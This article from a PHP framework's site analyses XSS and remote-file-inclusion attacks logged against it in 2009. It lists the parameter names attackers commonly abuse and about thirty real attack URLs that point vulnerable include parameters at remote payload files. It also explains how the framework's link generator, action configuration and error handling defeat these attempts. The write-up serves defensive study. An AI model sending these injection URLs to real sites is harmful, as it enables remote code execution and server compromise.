Hacking & the APF 2009/2010

1. Introduction

In 2009, a drastic increase of XSS and code injection attacks could be recognized on the APF web site. Analyzing the log files, we found 92,334 known attacks that were caught by the framework and a total number of 672,152 attacks.

APF security award The APF Security Promise: Use the APF and profit by its security mechanisms! From scratch securely designed applications prevent the compromise of your system, guarantee the safety of your users data and of your reputation and let you put your mind at ease.

This article describes, which mechanisms are included in the APF to face this danger and to secure your custom application.

2. Attacks

2.1. Kind of attacks

Most of the attacks are XSS and code injection attacks. They try to exploit vulnerabilities to inject third party content or code into the target application. Fortunately, the signature of these attacks is similar in 95% of the attacks. Here is the pattern description:

Code
[?|&]vulnerability_param=http://domain.tld/some/path/injection_code.ext

Merely, the name of the parameter differs from request to request:

  • tpl_pgb_moddir
  • page
  • mosConfig_absolute_path
  • sourcedir
  • file
  • dir[inc]
  • includedir
  • phpbb_root_path
  • _SERVER[DOCUMENT_ROOT]
  • _zb_path
  • cfg[path][contenido]
  • base_folder
  • spaw_root
  • includePath

The subsequent code box contains a selection of urls, that have been used to display third party content on the APF web page or to inject third party code into the APF:

Code
/!rfihttp://www.nicheresaleprofits.com/cbmarketer/image/id?? /!scan23http://sito.blackdrag0n.net/Cartoon/idnew.txt? /%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? /%20%20//?_shop_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt??? /%20%20//?mosconfig_absolute_path=http://largeface.com/gnuboard4/gnus/fxid.txt? /%20%20//inc/functions_inc.php?gb_pfad=http://82.146.51.16/scan/copyright.txt?? /%20%20//includes/DProtect/Framework/EmailTemplates.class.php?GLOBALS[RootPath]=http://www.junggosum.com/bbs/data/sports_2/idxx.txt?? /%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://n34.biz/id1.txt??? /%20%20//tools/send_reminders.php?noSet=0&includedir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? /%20%20/e404.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? /?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? /?dir_ws=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? /?_zb_path=http://kb27.co.kr/bbs///data/cok.txt?? /tools/send_reminders.php?includedir=http://208.98.22.241/id.txt??%0D?? /?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://204.3.167.134/xxx? /modules/My_eGallery/index.php?basepath=http://urogyn.co.kr/uro/install/idxx.txt?? /show_news.php?cutepath=http://laloggia.by.ru/up/ctrl.txt?? /skin/zero_vote/setup.php?dir=http://206.126.97.21/~talagaho/id.txt??? /Neos_Chronos/header.php?base_folder=http://www.jocainmo.es/img/.z/d?? /buscar.php?query=http://www.candidography.com/id1.txt?? /?_PHPLIB[libdir]=http://cdshop.net.ru////cron/hjr.txt?? /inc/cmses/aedating4CMS.php?dir[inc]=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//colby/id.txt?? /naboard_pnr.php?skin=http://www.cinepopbrasil.com.br/sistem.txt??? /phpSecurePages/secure.php?&cfgProgDir=http://www.steannareptile.it//administrator/idi.txt??? /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://tdaa.by.ru/safe.txt??? /skin/ggambo7002_board/contact.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? /jahoot.com/search.php?=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://laloggia.by.ru/up/ctrl.txt?? /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?http://musicadelibreria.net/footer?? /Page//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://kb27.co.kr/bbs///data/cok.txt??

2.2. Reported attacks

After having checked Apache's access logfiles, we started to analyze the application log files. This effort resulted in 3 groups of attacks. All of them tried to manipulate the url to inject content or code to the application:

Code
parse_url(/Page/048-My-first-website%20%20/page.php?doc=http://unixstats.org/tools/idxx.txt??): Unable to parse URL (Number: 2, File: ***/APF/tools/link/LinkGenerator.php, Line: 3114) [Document::loadContentFromFile()] Design "Page" not existent in namespace "APF\modules\comments\pres\templates"! Please check your template code (***). (Number: 256, File: ***/APF/core/pagecontroller/pagecontroller.php, Line: 1378) [Frontcontroller::parseActions()] No config section for action key "setLangu" available in configuration file "***_actionconfig.ini" in namespace "DOCS\biz\actions" and context "sites::***"! (Number: 256, File: ***/APF/core/frontcontroller/Frontcontroller.php, Line: 555)

The first line is a try-out to inject external code. If the offender would have been successful, the code is used to spy out information about the web server and the application running on the machine. Subsequent request are then used to explicitly manipulate the application and the content.

In case the developer uses URL rewriting, such attacks ara quite worthless, because the input filter rewrites the url to a generic param value couple.

In case the developer uses the APF components like the LinkGenerator, urls like presented above are recognized semantically invalid and an exception is thrown. This exception can be caught and logged by the integrated Exception handling very easily.

The second line describes the attempt to manipulate a known parameter of the application to display third party content. Potentially, the APF offers the chance to manipulare the template included by the <core:importdesign /> taglib by changing the url, but the template path is created with security in mind.

In the third line the attacker tries to manipulate a param of a front controller action to execute the desired action. Within the APF, actions are defined within a configuration file and the url params only refer to this configuration. Hence, it is not possible to successfully manipulate an action call by url.

3. Error handling

In order to not provide much information to the attacker, it is recommended to implement a special ErrorHandler that logs the upcoming errors to a log file and keeps quiet on the cause of the error.

The wiki page Script kiddies ErrorHandler (German) describes, how you can implement such a ErrorHandler.

Comments

Do you want to add a comment to the article above, or do you want to post additional hints? So please click here. Comments already posted can be found below.
There are no comments belonging to this article.